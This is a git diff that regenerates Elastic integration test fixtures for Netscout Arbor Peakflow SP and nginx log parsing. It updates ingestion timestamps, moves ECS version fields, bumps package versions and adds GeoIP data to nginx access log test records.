11:05:41 fdeFi", "event": { - "ingested": "2021-06-09T12:10:11.780899200Z" + "ingested": "2021-12-14T14:48:29.264367760Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "November 16 18:08:15 pfsp: BGP down for router ati, leader tlabo since 2017-11-16 18:08:15 uames", "event": { - "ingested": "2021-06-09T12:10:11.780903100Z" + "ingested": "2021-12-14T14:48:29.264368141Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "December 1 01:10:49 pfsp: script offi ran at 2017-12-01 01:10:49 , leader giatnu", "event": { - "ingested": "2021-06-09T12:10:11.780906900Z" + "ingested": "2021-12-14T14:48:29.264368524Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "December 15 08:13:24 untex: Blocked Host: Blocked host10.83.23.104attisetqby Blocked Countries usingrdpdestination10.163.161.165,URL:https://www5.example.org/atem/gnido.txt?tmollita=fde#nsecte", "event": { - "ingested": "2021-06-09T12:10:11.780911200Z" + "ingested": "2021-12-14T14:48:29.264369028Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "December 29 15:15:58 pfsp: GRE tunnel restored for destination 10.53.248.4, leader derit at 2017-12-29 15:15:58 dexea", "event": { - "ingested": "2021-06-09T12:10:11.780915100Z" + "ingested": "2021-12-14T14:48:29.264369407Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "January 12 22:18:32 pfsp: Test syslog message", "event": { - "ingested": "2021-06-09T12:10:11.780919200Z" + "ingested": "2021-12-14T14:48:29.264369894Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "January 27 05:21:06 pfsp: Alert Flow down for router tessec, leader olupta since 2018-01-27 05:21:06 litse", "event": { - "ingested": "2021-06-09T12:10:11.780923800Z" + "ingested": "2021-12-14T14:48:29.264370271Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "February 10 12:23:41 pfsp: Alert Host Detection alert sperna, start 2018-02-10 12:23:41 sintocc, duration 24.633000, stop 2018-02-10 12:23:41 scivelit, , importance medium, managed_objects (ehen), is now success, (parent managed object quameius)", "event": { - "ingested": "2021-06-09T12:10:11.780927700Z" + "ingested": "2021-12-14T14:48:29.264370648Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "February 24 19:26:15 ate: Change Log: Username:uiac, Subsystem:epte, Setting Type:idolo, Message:quinesc", "event": { - "ingested": "2021-06-09T12:10:11.780931600Z" + "ingested": "2021-12-14T14:48:29.264371111Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "March 11 02:28:49 pfsp: BGP Instability for router iatisu ended", "event": { - "ingested": "2021-06-09T12:10:11.780935500Z" + "ingested": "2021-12-14T14:48:29.264371536Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "March 25 09:31:24 evolu: Change Log: Username:ersp, Subsystem:tquov, Setting Type:diconseq, Message:inven", "event": { - "ingested": "2021-06-09T12:10:11.780939300Z" + "ingested": "2021-12-14T14:48:29.264371913Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "April 8 16:33:58 pfsp: Test syslog message", "event": { - "ingested": "2021-06-09T12:10:11.780943100Z" + "ingested": "2021-12-14T14:48:29.264372280Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "April 22 23:36:32 Sedutp: Test: Test syslog message", "event": { - "ingested": "2021-06-09T12:10:11.780947Z" + "ingested": "2021-12-14T14:48:29.264372657Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "May 7 06:39:06 ema: Change Log: Username:rsitv, Subsystem:iciade, Setting Type:ntiumt, Message:iquipe", "event": { - "ingested": "2021-06-09T12:10:11.780951Z" + "ingested": "2021-12-14T14:48:29.264373035Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "May 21 13:41:41 quin: Protection Mode: Changed protection mode to active for protection groupupida,URL:https://api.example.com/eufugi/pici.html?ccaecat=tquiin#tse", "event": { - "ingested": "2021-06-09T12:10:11.780955200Z" + "ingested": "2021-12-14T14:48:29.264373409Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "June 4 20:44:15 minimav: Change Log: Username:udexerci, Subsystem:naal, Setting Type:lore, Message:tnonpro", "event": { - "ingested": "2021-06-09T12:10:11.780959Z" + "ingested": "2021-12-14T14:48:29.264373814Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "June 19 03:46:49 pfsp: The Device illoin unreachable by controller tanimid since 2018-06-19 03:46:49", "event": { - "ingested": "2021-06-09T12:10:11.780963Z" + "ingested": "2021-12-14T14:48:29.264374188Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "July 3 10:49:23 pfsp: configuration was changed on leader natuse to version 1.4425 by ati", "event": { - "ingested": "2021-06-09T12:10:11.780966900Z" + "ingested": "2021-12-14T14:48:29.264374575Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "July 17 17:51:58 boree: anomaly: anomaly Bandwidth id 2366 status queips severity low classification itess router iscinge router_name ofdeFini interface irat interface_name \"enp0s4306\" aturauto", "event": { - "ingested": "2021-06-09T12:10:11.780970700Z" + "ingested": "2021-12-14T14:48:29.264374944Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "August 1 00:54:32 pfsp: SNMP restored for router entsunt, leader ihilm at 2018-08-01 00:54:32 dmin", "event": { - "ingested": "2021-06-09T12:10:11.780974600Z" + "ingested": "2021-12-14T14:48:29.264375338Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "August 15 07:57:06 pfsp: The Host Detection alert uscipitl, start 2018-08-15 07:57:06 uia, duration 29.657000, direction internal, host 10.54.49.84, signatures (ciad), impact tali, importance medium, managed_objects (mexe), (parent managed object its)", "event": { - "ingested": "2021-06-09T12:10:11.780978700Z" + "ingested": "2021-12-14T14:48:29.264375717Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "August 29 14:59:40 pfsp: Alert Test syslog message", "event": { - "ingested": "2021-06-09T12:10:11.780982700Z" + "ingested": "2021-12-14T14:48:29.264376099Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "September 12 22:02:15 pfsp: anomaly Bandwidth id 5089 status commodo severity medium classification tutlab router sau router_name atevelit interface meius interface_name \"lo4293\" labo", "event": { - "ingested": "2021-06-09T12:10:11.780986600Z" + "ingested": "2021-12-14T14:48:29.264376479Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "September 27 05:04:49 pfsp: Alert script nre ran at 2018-09-27 05:04:49 veli, leader volupta", "event": { - "ingested": "2021-06-09T12:10:11.780990600Z" + "ingested": "2021-12-14T14:48:29.264376863Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "October 11 12:07:23 pfsp: The BGP instability router uptate threshold mac (iumdol) observed tpersp (stla)", "event": { - "ingested": "2021-06-09T12:10:11.780994500Z" + "ingested": "2021-12-14T14:48:29.264377240Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "October 25 19:09:57 pfsp: Alert TMS 'tem' fault for resource 'dol' on TMS proiden", "event": { - "ingested": "2021-06-09T12:10:11.780998300Z" + "ingested": "2021-12-14T14:48:29.264377617Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "November 9 02:12:32 pfsp: Device isis reachable again by controller uasiar at 2018-11-09 02:12:32 utlab", "event": { - "ingested": "2021-06-09T12:10:11.781002200Z" + "ingested": "2021-12-14T14:48:29.264377998Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "November 23 09:15:06 pfsp: Alert script dantium ran at 2018-11-23 09:15:06 lor, leader velillu", "event": { - "ingested": "2021-06-09T12:10:11.781022800Z" + "ingested": "2021-12-14T14:48:29.264378447Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "December 7 16:17:40 pfsp: The script tvolu ran at 2018-12-07 16:17:40 nreprehe, leader tetu", "event": { - "ingested": "2021-06-09T12:10:11.781029200Z" + "ingested": "2021-12-14T14:48:29.264378832Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "December 21 23:20:14 temporin: Blocked Host: Blocked host10.122.76.148atmiuby Blocked Countries usingipv6-icmpdestination10.28.226.128,URL:https://mail.example.org/idunt/luptat.txt?ica=lillum#remips", "event": { - "ingested": "2021-06-09T12:10:11.781035400Z" + "ingested": "2021-12-14T14:48:29.264379328Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "January 5 06:22:49 cola: Protection Mode: Changed protection mode to active for protection groupamcor,URL:https://internal.example.com/ineavol/iosa.html?usc=rem#amvolupt", "event": { - "ingested": "2021-06-09T12:10:11.781039900Z" + "ingested": "2021-12-14T14:48:29.264379710Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "January 19 13:25:23 mnis: Protection Mode: Changed protection mode to active for protection groupequepor,URL:https://internal.example.org/quaUten/nisiut.txt?teturad=perspici#itation", "event": { - "ingested": "2021-06-09T12:10:11.781044300Z" + "ingested": "2021-12-14T14:48:29.264380075Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "February 2 20:27:57 nimave: Protection Mode: Changed protection mode to active for protection groupisciv,URL:https://mail.example.org/nofd/dipisci.txt?ilmol=eri#quunt", "event": { - "ingested": "2021-06-09T12:10:11.781048600Z" + "ingested": "2021-12-14T14:48:29.264380455Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "February 17 03:30:32 iosamnis: Blocked Host: Blocked host10.31.177.226atdeserunby Blocked Countries usingggpdestination10.98.209.10,URL:https://www.example.org/ptateve/enderi.html?toccaec=fugi#labo", "event": { - "ingested": "2021-06-09T12:10:11.781052700Z" + "ingested": "2021-12-14T14:48:29.264380831Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "March 3 10:33:06 estl: Blocked Host: Blocked host10.44.47.27atmmodocby Blocked Countries usingigmpdestination10.179.210.218,URL:https://www.example.org/tanimi/rumSecti.jpg?emporain=ntiumto#umetMalo", "event": { - "ingested": "2021-06-09T12:10:11.781056700Z" + "ingested": "2021-12-14T14:48:29.264381206Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "March 17 17:35:40 pfsp: Alert configuration was changed on leader emvele to version 1.2883 by lor", "event": { - "ingested": "2021-06-09T12:10:11.781060700Z" + "ingested": "2021-12-14T14:48:29.264381588Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "April 1 00:38:14 pfsp: Alert BGP instability router iquamqua threshold sit (rumSect) observed ita (vitaed)", "event": { - "ingested": "2021-06-09T12:10:11.781064500Z" + "ingested": "2021-12-14T14:48:29.264382348Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "April 15 07:40:49 pfsp: Alert Test syslog message", "event": { - "ingested": "2021-06-09T12:10:11.781068500Z" + "ingested": "2021-12-14T14:48:29.264382772Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "April 29 14:43:23 numquam: Change Log: Username:tMal, Subsystem:ommodo, Setting Type:uptat, Message:idex", "event": { - "ingested": "2021-06-09T12:10:11.781072300Z" + "ingested": "2021-12-14T14:48:29.264383148Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "May 13 21:45:57 pfsp: Alert configuration was changed on leader maveni to version 1.2552 by onu", "event": { - "ingested": "2021-06-09T12:10:11.781077100Z" + "ingested": "2021-12-14T14:48:29.264383529Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "May 28 04:48:31 pfsp: Alert BGP Hijack for prefix tlaboree router norumet done", "event": { - "ingested": "2021-06-09T12:10:11.781082100Z" + "ingested": "2021-12-14T14:48:29.264383904Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "June 11 11:51:06 pfsp: Host Detection alert col, start 2019-06-11 11:51:06 mve, duration 177.586000, stop 2019-06-11 11:51:06 tinvolup, , importance very-high, managed_objects (Sedutpe), is now failure, (parent managed object rroq)", "event": { - "ingested": "2021-06-09T12:10:11.781086500Z" + "ingested": "2021-12-14T14:48:29.264384291Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "June 25 18:53:40 pfsp: script remipsum ran at 2019-06-25 18:53:40 , leader tempor", "event": { - "ingested": "2021-06-09T12:10:11.781090500Z" + "ingested": "2021-12-14T14:48:29.264384660Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "July 10 01:56:14 ccae: Change Log: Username:orroqu, Subsystem:elitsed, Setting Type:labore, Message:uela", "event": { - "ingested": "2021-06-09T12:10:11.781094300Z" + "ingested": "2021-12-14T14:48:29.264385033Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "July 24 08:58:48 uto: Test: Test syslog message", "event": { - "ingested": "2021-06-09T12:10:11.781124700Z" + "ingested": "2021-12-14T14:48:29.264385403Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "August 7 16:01:23 remq: Change Log: Username:veniamq, Subsystem:occ, Setting Type:oloreseo, Message:iruredol", "event": { - "ingested": "2021-06-09T12:10:11.781132900Z" + "ingested": "2021-12-14T14:48:29.264385783Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "August 21 23:03:57 cupi: Blocked Host: Blocked host10.151.129.181atduntby Blocked Countries usingggpdestination10.55.156.64,URL:https://www.example.net/itanim/nesciun.txt?mollita=tatem#iae", "event": { - "ingested": "2021-06-09T12:10:11.781138700Z" + "ingested": "2021-12-14T14:48:29.264386172Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "September 5 06:06:31 eumi: Protection Mode: Changed protection mode to active for protection groupquasiarc,URL:https://www.example.net/rever/ore.jpg?oluptat=metco#acom", "event": { - "ingested": "2021-06-09T12:10:11.781143100Z" + "ingested": "2021-12-14T14:48:29.264386556Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "September 19 13:09:05 pfsp: The Host Detection alert inBCSedu, start 2019-09-19 13:09:05 erspi, duration 77.637000, direction internal, host 10.46.77.76, signatures (iacons), impact occaec, importance medium, managed_objects (uov), (parent managed object quaeab)", "event": { - "ingested": "2021-06-09T12:10:11.781147400Z" + "ingested": "2021-12-14T14:48:29.264386947Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "October 3 20:11:40 pfsp: Hardware failure on ntiu since 2019-10-03 20:11:40 GMT: radipisc", "event": { - "ingested": "2021-06-09T12:10:11.781151400Z" + "ingested": "2021-12-14T14:48:29.264387318Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "October 18 03:14:14 pfsp: script vitaed ran at 2019-10-18 03:14:14 ser, leader etconsec", "event": { - "ingested": "2021-06-09T12:10:11.781155200Z" + "ingested": "2021-12-14T14:48:29.264387696Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "November 1 10:16:48 upt: Blocked Host: Blocked host10.73.89.189atidoloby Blocked Countries usingicmpdestination10.166.90.130,URL:https://api.example.org/eosquira/pta.htm?econs=lmolesti#apariatu", "event": { - "ingested": "2021-06-09T12:10:11.781159100Z" + "ingested": "2021-12-14T14:48:29.264388067Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "November 15 17:19:22 pfsp: Alert script msequ ran at 2019-11-15 17:19:22 uat, leader lupta", "event": { - "ingested": "2021-06-09T12:10:11.781163100Z" + "ingested": "2021-12-14T14:48:29.264388443Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "November 30 00:21:57 tlabori: Protection Mode: Changed protection mode to active for protection grouplaudan,URL:https://www5.example.com/atcupida/tessequa.htm?dolores=equamnih#taliqui", "event": { - "ingested": "2021-06-09T12:10:11.781168700Z" + "ingested": "2021-12-14T14:48:29.264388815Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "December 14 07:24:31 destlabo: Change Log: Username:rcitat, Subsystem:dolorema, Setting Type:emagn, Message:radipis", "event": { - "ingested": "2021-06-09T12:10:11.781172800Z" + "ingested": "2021-12-14T14:48:29.264389186Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" diff --git a/packages/netscout/manifest.yml b/packages/netscout/manifest.yml index 667ab6f9f3b..6467fe9cdfb 100644 --- a/packages/netscout/manifest.yml +++ b/packages/netscout/manifest.yml @@ -1,7 +1,7 @@ format_version: 1.0.0 name: netscout title: Arbor Peakflow SP Logs -version: 0.6.0 +version: 0.6.1 description: Collect and parse logs from Netscout Arbor Peakflow SP with Elastic Agent. categories: ["security"] release: experimental diff --git a/packages/nginx/changelog.yml b/packages/nginx/changelog.yml index 05b88bf7e0c..44ec8316cf9 100644 --- a/packages/nginx/changelog.yml +++ b/packages/nginx/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "1.2.3" + changes: + - description: Regenerate test files using the new GeoIP database + type: bugfix + link: https://github.com/elastic/integrations/pull/2339 - version: "1.2.2" changes: - description: Change test public IPs to the supported subset diff --git a/packages/nginx/data_stream/access/_dev/test/pipeline/test-access.log-expected.json b/packages/nginx/data_stream/access/_dev/test/pipeline/test-access.log-expected.json index 778ef7889f7..6013a669fdc 100644 --- a/packages/nginx/data_stream/access/_dev/test/pipeline/test-access.log-expected.json +++ b/packages/nginx/data_stream/access/_dev/test/pipeline/test-access.log-expected.json @@ -9,6 +9,18 @@ } }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "address": "67.43.156.13", "ip": "67.43.156.13" }, @@ -42,7 +54,7 @@ } }, "event": { - "ingested": "2021-12-09T13:41:40.653051900Z", + "ingested": "2021-12-14T14:48:32.282353575Z", "original": "67.43.156.13 - - [25/Oct/2016:14:49:33 +0200] \"GET / HTTP/1.1\" 200 612 \"-\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.59 Safari/537.36\"", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -77,6 +89,18 @@ } }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "address": "67.43.156.13", "ip": "67.43.156.13" }, @@ -112,7 +136,7 @@ } }, "event": { - "ingested": "2021-12-09T13:41:40.653067Z", + "ingested": "2021-12-14T14:48:32.282356218Z", "original": "67.43.156.13 - - [25/Oct/2016:14:49:34 +0200] \"GET /favicon.ico HTTP/1.1\" 404 571 \"http://localhost:8080/\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.59 Safari/537.36\"", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -147,6 +171,18 @@ } }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "address": "67.43.156.13", "ip": "67.43.156.13" }, @@ -180,7 +216,7 @@ } }, "event": { - "ingested": "2021-12-09T13:41:40.653072600Z", + "ingested": "2021-12-14T14:48:32.282356644Z", "original": "67.43.156.13 - - [25/Oct/2016:14:50:44 +0200] \"GET /adsasd HTTP/1.1\" 404 571 \"-\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.59 Safari/537.36\"", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -215,6 +251,18 @@ } }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "address": "67.43.156.13", "ip": "67.43.156.13" }, @@ -248,7 +296,7 @@ } }, "event": { - "ingested": "2021-12-09T13:41:40.653079800Z", + "ingested": "2021-12-14T14:48:32.282357030Z", "original": "67.43.156.13 - - [07/Dec/2016:10:34:43 +0100] \"GET / HTTP/1.1\" 200 612 \"-\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.98 Safari/537.36\"", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -283,6 +331,18 @@ } }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "address": "67.43.156.13", "ip": "67.43.156.13" }, @@ -318,7 +378,7 @@ } }, "event": { - "ingested": "2021-12-09T13:41:40.653088800Z", + "ingested": "2021-12-14T14:48:32.282357376Z", "original": "67.43.156.13 - - [07/Dec/2016:10:34:43 +0100] \"GET /favicon.ico HTTP/1.1\" 404 571 \"http://localhost:8080/\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.98 Safari/537.36\"", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -353,6 +413,18 @@ } }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "address": "67.43.156.13", "ip": "67.43.156.13" }, @@ -386,7 +458,7 @@ } }, "event": { - "ingested": "2021-12-09T13:41:40.653098400Z", + "ingested": "2021-12-14T14:48:32.282357746Z", "original": "67.43.156.13 - - [07/Dec/2016:10:43:18 +0100] \"GET /test HTTP/1.1\" 404 571 \"-\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.98 Safari/537.36\"", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -421,6 +493,18 @@ } }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "address": "67.43.156.13", "ip": "67.43.156.13" }, @@ -454,7 +538,7 @@ } }, "event": { - "ingested": "2021-12-09T13:41:40.653105800Z", + "ingested": "2021-12-14T14:48:32.282358112Z", "original": "67.43.156.13 - - [07/Dec/2016:10:43:21 +0100] \"GET /test HTTP/1.1\" 404 571 \"-\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.98 Safari/537.36\"", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -489,6 +573,18 @@ } }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "address": "67.43.156.13", "ip": "67.43.156.13" }, @@ -522,7 +618,7 @@ } }, "event": { - "ingested": "2021-12-09T13:41:40.653111900Z", + "ingested": "2021-12-14T14:48:32.282358462Z", "original": "67.43.156.13 - - [07/Dec/2016:10:43:23 +0100] \"GET /test1 HTTP/1.1\" 404 571 \"-\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.98 Safari/537.36\"", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -590,7 +686,7 @@ } }, "event": { - "ingested": "2021-12-09T13:41:40.653118Z", + "ingested": "2021-12-14T14:48:32.282358812Z", "original": "127.0.0.1 - - [07/Dec/2016:11:04:37 +0100] \"GET /test1 HTTP/1.1\" 404 571 \"-\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.98 Safari/537.36\"", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -658,7 +754,7 @@ } }, "event": { - "ingested": "2021-12-09T13:41:40.653124800Z", + "ingested": "2021-12-14T14:48:32.282359158Z", "original": "127.0.0.1 - - [07/Dec/2016:11:04:58 +0100] \"GET / HTTP/1.1\" 304 0 \"-\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:49.0) Gecko/20100101 Firefox/49.0\"", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -726,7 +822,7 @@ } }, "event": { - "ingested": "2021-12-09T13:41:40.653133100Z", + "ingested": "2021-12-14T14:48:32.282359505Z", "original": "127.0.0.1 - - [07/Dec/2016:11:04:59 +0100] \"GET / HTTP/1.1\" 304 0 \"-\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:49.0) Gecko/20100101 Firefox/49.0\"", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -794,7 +890,7 @@ } }, "event": { - "ingested": "2021-12-09T13:41:40.653141500Z", + "ingested": "2021-12-14T14:48:32.282360050Z", "original": "127.0.0.1 - - [07/Dec/2016:11:05:07 +0100] \"GET /taga HTTP/1.1\" 404 169 \"-\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:49.0) Gecko/20100101 Firefox/49.0\"\nlessons.example.com 192.168.0.1 - - [09/Jun/2020:12:10:39 -0700] \"GET /A%20Beka%20G1%20Howe/029_AND_30/15%20reading%20elephants.mp4 HTTP/1.1\" 206 7648063 \"http://lessons.example.com/A%20Beka%20G1%20Howe/029_AND_30/15%20reading%20elephants.mp4\" \"Mozilla/5.0 (Linux; Android 5.1.1; KFFOWI) AppleWebKit/537.36 (KHTML, like Gecko) Silk/81.2.16 like Chrome/81.0.4044.138 Safari/537.36\"\nlessons.example.com 192.168.0.1 - - [09/Jun/2020:12:15:39 -0700] \"GET 